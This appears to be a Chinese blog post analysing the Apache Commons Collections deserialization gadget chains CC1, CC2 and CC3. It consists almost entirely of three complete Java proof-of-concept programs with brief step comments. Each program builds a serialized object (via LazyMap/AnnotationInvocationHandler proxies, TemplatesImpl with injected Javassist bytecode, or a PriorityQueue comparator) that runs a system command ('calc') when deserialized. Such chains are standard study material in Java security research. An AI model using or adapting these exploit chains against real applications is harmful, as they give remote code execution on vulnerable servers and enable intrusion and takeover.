CC1分析

POC：

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InvokerTransformer;

import org.apache.commons.collections.map.LazyMap;

import org.apache.commons.collections.map.TransformedMap;

import java.io.*;

import java.lang.annotation.Retention;

import java.lang.reflect.Constructor;

import java.lang.reflect.InvocationHandler;

import java.lang.reflect.InvocationTargetException;

import java.lang.reflect.Proxy;

import java.util.HashMap;

import java.util.Map;

public class cc1 {

public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException {

//通过字节码构建恶意类

Transformer[] transformers = new Transformer[] {

new ConstantTransformer(Runtime.class),

new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),

new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),

new InvokerTransformer("exec", new Class[] { String.class }, new Object[] { "calc" }) };

Transformer transformerChain = new ChainedTransformer(transformers);

Map innermap = new HashMap();

Map outmap = LazyMap.decorate(innermap, transformerChain);

//反射创建AnnotationInvocationHandler类

Class clazz = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

Constructor construct = clazz.getDeclaredConstructor(Class.class, Map.class);

construct.setAccessible(true);

//将通过反射创建的AnnotationInvocationHandler类转换为InvocationHandler(反射得到的对象是Object类，无法作为newProxyInstance的参数)

//只能强转为InvocationHandler接口类

InvocationHandler handler = (InvocationHandler) construct.newInstance(Retention.class, outmap);

Map proxyMap = (Map) Proxy.newProxyInstance(Map.class.getClassLoader(), new Class[] {Map.class}, handler);

handler = (InvocationHandler)construct.newInstance(Retention.class, proxyMap);

ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));

outputStream.writeObject(handler);

outputStream.close();

ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));

inputStream.readObject();

}

CC2分析

import javassist.ClassPool;

import javassist.CtClass;

import org.apache.commons.collections4.comparators.TransformingComparator;

import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;

import java.lang.reflect.Constructor;

import java.lang.reflect.Field;

import java.util.PriorityQueue;

public class cc2 {

public static void main(String[] args) throws Exception {

//通过字节码构建恶意类

ClassPool classPool=ClassPool.getDefault();

String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

classPool.appendClassPath(AbstractTranslet);

CtClass payload=classPool.makeClass("CommonsCollections3");

payload.setSuperclass(classPool.get(AbstractTranslet));

payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

byte[] bytes=payload.toBytecode();

//反射创建TemplatesImpl

Class<?> aClass = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl");

Constructor<?> constructor = aClass.getDeclaredConstructor(new Class[]{});

Object TemplatesImpl_instance = constructor.newInstance();

//将恶意类的字节码设置给_bytecodes属性

Field bytecodes = aClass.getDeclaredField("_bytecodes");

bytecodes.setAccessible(true);

bytecodes.set(TemplatesImpl_instance, new byte[][]{bytes});

//设置属性_name为恶意类名

Field name = aClass.getDeclaredField("_name");

name.setAccessible(true);

name.set(TemplatesImpl_instance, "TestTemplatesImpl");

//构造利用链

InvokerTransformer transformer = new InvokerTransformer("newTransformer", null, null);

TransformingComparator transformer_comparator = new TransformingComparator(transformer);

PriorityQueue queue = new PriorityQueue(2);

queue.add(1);

//设置comparator属性

Field field = queue.getClass().getDeclaredField("comparator");

field.setAccessible(true);

field.set(queue, transformer_comparator);

//设置queue属性

field = queue.getClass().getDeclaredField("queue");

field.setAccessible(true);

Object[] objects = new Object[]{TemplatesImpl_instance, TemplatesImpl_instance};

field.set(queue, objects);

ByteArrayOutputStream barr = new ByteArrayOutputStream();

ObjectOutputStream oos = new ObjectOutputStream(barr);

oos.writeObject(queue);

ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray()));

Object object = ois.readObject();

oos.close();

}

CC3分析

import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;

import javassist.CannotCompileException;

import javassist.ClassPool;

import javassist.CtClass;

import javassist.NotFoundException;

import org.apache.commons.collections.Transformer;

import org.apache.commons.collections.functors.ChainedTransformer;

import org.apache.commons.collections.functors.ConstantTransformer;

import org.apache.commons.collections.functors.InstantiateTransformer;

import org.apache.commons.collections.map.LazyMap;

import javax.xml.transform.Templates;

import java.io.*;

import java.lang.reflect.*;

import java.util.HashMap;

import java.util.Map;

public class cc3 {

public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IOException, IllegalAccessException, InvocationTargetException, InstantiationException, NotFoundException, CannotCompileException, NoSuchFieldException {

//通过字节码构建恶意类

ClassPool classPool=ClassPool.getDefault();

String AbstractTranslet="com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

classPool.appendClassPath(AbstractTranslet);

CtClass payload=classPool.makeClass("CommonsCollections3");

payload.setSuperclass(classPool.get(AbstractTranslet));

payload.makeClassInitializer().setBody("java.lang.Runtime.getRuntime().exec(\"calc\");");

byte[] bytes=payload.toBytecode();

//反射创建TemplatesImpl类

String TemplatesImpl="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";

Object templatesImpl=Class.forName(TemplatesImpl).getDeclaredConstructor(new Class[]{}).newInstance();

//修改_bytecodes属性并加入恶意字节码

Field field=templatesImpl.getClass().getDeclaredField("_bytecodes");

field.setAccessible(true);

field.set(templatesImpl,new byte[][]{bytes});

//修改_name属性，为了让程序安装想要的流程进行

Field field1=templatesImpl.getClass().getDeclaredField("_name");

field1.setAccessible(true);

field1.set(templatesImpl,"test");

//创建transformer[]对象

Transformer[] transformers=new Transformer[]{

new ConstantTransformer(TrAXFilter.class),

new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templatesImpl})

};

ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);

Map map=new HashMap();

Map lazyMap= LazyMap.decorate(map,chainedTransformer);

//获取AnnotationInvocationHandler有参构造方法

Class cls=Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");

Constructor constructor=cls.getDeclaredConstructor(Class.class,Map.class);

constructor.setAccessible(true);

//直接构造一个AnnotationInvocationHandler作为动态代理类

Object annotationInvocationHandler=constructor.newInstance(Override.class,lazyMap);

//使用动态代理创建了一个Map接口类，由于反射生成的annotationInvocationHandler是Object对象，

// 且不能直接加载annotationInvocationHandler，因此只能强转为InvocationHandler

Map map1=(Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(),LazyMap.class.getInterfaces(),(InvocationHandler) annotationInvocationHandler);

Object object=constructor.newInstance(Override.class,map1);

ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("test.out"));

outputStream.writeObject(object);

outputStream.close();

ObjectInputStream inputStream=new ObjectInputStream(new FileInputStream("test.out"));

inputStream.readObject();

}

commons-collections1-3分析

commons-collections1-3分析

CC1分析

CC2分析

CC3分析

推荐阅读更多精彩内容